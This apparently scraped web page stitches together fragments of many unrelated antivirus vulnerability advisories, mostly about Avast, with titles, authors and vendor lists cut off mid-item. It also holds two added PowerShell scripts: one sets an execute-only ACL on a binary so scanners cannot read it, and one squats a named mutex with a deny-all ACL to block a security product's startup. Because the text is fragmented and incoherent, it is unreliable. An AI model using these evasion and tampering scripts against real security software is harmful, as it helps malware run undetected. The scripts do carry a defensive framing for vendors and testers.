URL:
http://blog.zoller.lu/2009/04/release-mode-forced-release-vendor-has.html
Update: after avast's reaction it is now clear that all versions and products are affected; however, there is no committed plan to patch: a fix may or may not come at some unspecified point in the future.
You are encouraged to read the timeline and draw your own conclusions.
ShineShadow Security Report 22102009-12
TITLE
Avast! Multiple Vulnerabilities
BACKGROUND
Avast! antivirus software represents complete virus protection, offering full desktop security including a resident shield. Daily automatic updates ensure continuous data protection against all types of malware and spyware. Avast! antivirus is certified by both ICSA Labs and West Coast Labs Checkmark.
Avast! Professional Edition 4.8 is a collection of award winning, high-end technologies that work in perfect synergy, having one common goal: to protect your system and valuable data against computer viruses, spyware and rootkits. It represents a best-in-class antivirus solution for any Windows-based workstation.
Abstract:
Some Windows antivirus software fails to detect, block and/or
disinfect/move/delete malware if the malware EXE file has only
execution permission and no read, write or other permissions.
The worst cases are NOD32 and Avast antivirus, which allow the
malware to run unimpeded. Avast has fixed the flaw while NOD32
is still vulnerable as of this writing.
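The following is an added illustration of the case the abstract describes; it is not code from the advisory or from any of the vendors named on this page. It copies a benign Windows binary, replaces its DACL with a single execute-only ACE for the current user, and then shows (a) that a scanner opening the file for read gets access denied, (b) that the image loader still starts it, because process creation needs only FILE_EXECUTE, and (c) one way a privileged scanner can still read such a file: a backup-mode open under SeBackupPrivilege, which ignores the DACL (`robocopy /B` is used here as a stand-in for that open). File and directory names are made up for the demo; it assumes Windows PowerShell 5.1, and step (c) assumes an elevated prompt.

```powershell
# Added example, not from the advisory. Reproduces the execute-only ACL case on a
# benign binary and shows why read-based scanning misses it. Names are made up.

$src  = Join-Path $env:SystemRoot 'System32\whoami.exe'   # stands in for the "malware" EXE
$path = Join-Path $env:TEMP 'xonly.exe'
Copy-Item -Path $src -Destination $path -Force

# Replace the inherited DACL with one ACE for the current user: execute only.
# SYNCHRONIZE and READ_ATTRIBUTES are granted because CreateFile always requests
# them; FILE_READ_DATA is deliberately absent.
$me  = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
$acl = Get-Acl -Path $path
$acl.SetAccessRuleProtection($true, $false)                        # drop inherited ACEs
foreach ($ace in @($acl.Access)) { $null = $acl.RemoveAccessRule($ace) }  # and explicit ones
$rights = [System.Security.AccessControl.FileSystemRights]'ExecuteFile, ReadAttributes, Synchronize'
$acl.AddAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule($me, $rights, 'Allow')))
Set-Acl -Path $path -AclObject $acl

# (a) What a scanner that opens the file for GENERIC_READ sees:
try {
    [System.IO.File]::ReadAllBytes($path) | Out-Null
    'scan: file readable'
} catch [System.UnauthorizedAccessException] {
    'scan: access denied, the signature engine never sees the bytes'
}

# (b) Process creation needs only FILE_EXECUTE on the image, so it still runs:
Start-Process -FilePath $path -Wait -NoNewWindow

# (c) A reader holding SeBackupPrivilege (SYSTEM, or an elevated admin) can open the
# file with backup semantics, which bypasses the DACL. robocopy /B does exactly that;
# the copy inherits the destination's normal ACL and is readable afterwards.
$principal = New-Object System.Security.Principal.WindowsPrincipal(
    [System.Security.Principal.WindowsIdentity]::GetCurrent())
if ($principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)) {
    $scanDir = Join-Path $env:TEMP 'scan'
    robocopy $env:TEMP $scanDir xonly.exe /B /NJH /NJS | Out-Null
    $bytes = [System.IO.File]::ReadAllBytes((Join-Path $scanDir 'xonly.exe'))
    "backup-mode copy: $($bytes.Length) bytes, header = $([char]$bytes[0])$([char]$bytes[1])"
} else {
    'skip (c): backup-mode read needs SeBackupPrivilege, run from an elevated prompt'
}
```

The practical check this suggests for a scanner vendor or a pentester: feed the product an EICAR test file whose DACL grants only ExecuteFile and see whether the on-access and on-demand scanners still flag it. A product that scans from user mode with a plain read handle will not; one that reads through its filter driver in kernel mode, or opens with backup semantics under SeBackupPrivilege, will. Note that the owner of the file keeps READ_CONTROL and WRITE_DAC implicitly, so the ACL can always be repaired by the owner or by an administrator taking ownership; the evasion is against the scanner's open, not against cleanup.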
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: avast! 4.7 aavmker4.sys Kernel Memory Corruption
Advisory ID: TKADV2008-002
Revision: 1.0
Release Date: 2008/03/30
Last Modified: 2008/03/30
Date Reported: 2008/03/16
Author: Tobias Klein (tk at trapkit.de)
Avast! AntiVirus TAR Processing Remote Heap Corruption
Sowhat of Nevis Labs
http://www.nevisnetworks.com
http://secway.org/advisory/AD20071206.txt
BID: 26702
Vendor:
http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html
=============[Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation]================
Author(s): Giuseppe 'Evilcry' Bonfa'
AbdulAziz Hariri
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
______________________________________________________________________
From the low-hanging-fruit-department - AVAST bypass/evasion
______________________________________________________________________
Release mode: Forced release, vendor has not replied.
Ref : TZO-092009 - AVAST Generic Evasion
WWW : http://blog.zoller.lu/2009/04/release-mode-forced-release-vendor-has.html
Vendor : http://www.avast.com
Security notification reaction rating : Catastrophic
Source: https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php
-----------[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]--------->
Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com
-----------------------------------------------------------------------
iViZ Techno Solutions Pvt. Ltd.
http://www.ivizsecurity.com
-----------------------------------------------------------------------
* Title: Avast antivirus for Linux multiple vulnerabilities.
* Date: 10/12/2008
* Software: Avast for Workstations v1.0.8
--[ Synopsis:
//----- Advisory
Program : avast! 4.8.1335 Professional
Homepage : http://www.avast.com
Discovery : 2009/07/29
Author Contacted : 2009/07/31
Found by : Heurs
This Advisory : Heurs
Contact : heurs@ghostsinthstack.org, s.leberre@sysdream.com
Impact: Bypassing detection of a malicious web page that can compromise a user's system
Vulnerable AV software:
ESET Smart Security, latest version (the exploit was written specifically for it)
AhnLab-V3 2008.12.4.1
AntiVir 7.9.0.36 2008.12.04
Avast 4.8.1281.0
CAT-QuickHeal 10.00
ClamAV 0.94.1
DrWeb 4.44.0.09170
Ewido 4.0
Ikarus T3.1.1.45.0
* BlackICE
* McAfee
* Pointsec
* ISS Proventia
* ZoneAlarm
* Avast
* AVG
* Trusteer Rapport
The latest security updates from Microsoft fix binary planting issues (loading of
dwmapi.dll) in the following applications (and probably many more):
1. Autodesk 3ds Max 2010 Release 12.0
2. Autodesk 3ds Max 2011 Release 13.0
3. Avast! Free Antivirus 5.0.545
4. Avira Premium Security Suite 10.0.0.542
5. BitDefender Total Security 2010 - Build 13.0.17.343
6. CorelDraw X5 15.1.0.588
7. Corel Paint Shop Pro Photo X3 13.2.0.41
8. CyberLink PowerDirector 8.00.2220
Vulnerable software:
* 3D EQSecure Professional Edition 4.2
* avast! Internet Security 5.0.462
* AVG Internet Security 9.0.791
* Avira Premium Security Suite 10.0.0.536
* BitDefender Total Security 2010 13.0.20.347
* Blink Professional 4.6.1
* CA Internet Security Suite Plus 2010 6.0.0.272
In 2009 we examined the effects of manipulating synchronization
objects in security software suites frequently found on personal
computers running Windows XP and Vista. The synchronization objects
were mutexes and events, and the security software included products
from AVG, Avast, Avira, BitDefender, BullGuard, CheckPoint, Eset,
F-Prot, F-Secure, Kaspersky, McAfee, Microsoft (Security Essentials),
Norman, Norton, Panda, PC Tools, Quick Heal, Symantec, and Trend
Micro.
The examinations revealed that nearly all suites suffered non-trivial
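As an added illustration of one kind of synchronization-object manipulation the passage above refers to (this is not code from that study, and the study's specific findings are not reproduced on this page), the script below has an unprivileged process create and hold the named mutex a product later expects to create for its own "already running?" check, with a DACL that denies every right to Everyone. Because CreateMutex on an existing name asks for MUTEX_ALL_ACCESS, the product's call fails with access denied; without the DACL it would simply see the object already exists and assume a second instance. The mutex name is made up; real products' object names are not on this page. It assumes Windows PowerShell 5.1 (.NET Framework, which exposes the MutexSecurity constructor overload).

```powershell
# Added example of named-mutex squatting, not from the study quoted above.
# 'Global\Demo_AV_SingleInstance' is a made-up name.

$name     = 'Global\Demo_AV_SingleInstance'
$everyone = New-Object System.Security.Principal.SecurityIdentifier(
    [System.Security.Principal.WellKnownSidType]::WorldSid, $null)

# Squatter: create the object first, take ownership of it, deny all rights to
# Everyone (which includes SYSTEM), and never release it. The squatter's own handle
# is unaffected: access is checked when a handle is opened, not on each use.
$sec = New-Object System.Security.AccessControl.MutexSecurity
$sec.AddAccessRule((New-Object System.Security.AccessControl.MutexAccessRule(
    $everyone, [System.Security.AccessControl.MutexRights]::FullControl, 'Deny')))
$createdNew = $false
$squat = [System.Threading.Mutex]::new($true, $name, [ref]$createdNew, $sec)
"squatter created $name first: $createdNew"

# Product, naive version: the classic single-instance check. Both failure modes
# end the same way, with the product not running.
function Start-NaiveProduct {
    param([string]$MutexName)
    $mine = $false
    try {
        $m = [System.Threading.Mutex]::new($false, $MutexName, [ref]$mine)
        if (-not $mine) { return 'naive product: another instance exists, exiting' }
        return 'naive product: started normally'
    } catch [System.UnauthorizedAccessException] {
        return 'naive product: CreateMutex denied, aborting startup'
    }
}
Start-NaiveProduct -MutexName $name

# Product, checked version: a pre-existing or inaccessible object is evidence of
# tampering, not of a twin. Inspect the owner before trusting it, and keep running.
function Start-CheckedProduct {
    param([string]$MutexName)
    $mine = $false
    try {
        $m = [System.Threading.Mutex]::new($false, $MutexName, [ref]$mine)
        if ($mine) { return 'checked product: started normally' }
        $owner = $m.GetAccessControl().GetOwner([System.Security.Principal.SecurityIdentifier])
        return "checked product: $MutexName already exists, owned by $owner; not trusting it, alerting"
    } catch [System.UnauthorizedAccessException] {
        return "checked product: $MutexName exists but is inaccessible; treating as tampering, alerting"
    }
}
Start-CheckedProduct -MutexName $name

$squat.Dispose()   # release the squatted object
```

The same pattern applies to named events: a process that pre-creates the event a product signals on, or that squats the name with a denying DACL, can keep a component waiting forever or make its startup fail. The general mitigations are to create such objects from a privileged component with an explicit DACL, to treat ERROR_ALREADY_EXISTS and ERROR_ACCESS_DENIED on one's own object names as tamper indicators rather than as "already running", and to avoid fixed, guessable names in the shared namespace where the design allows.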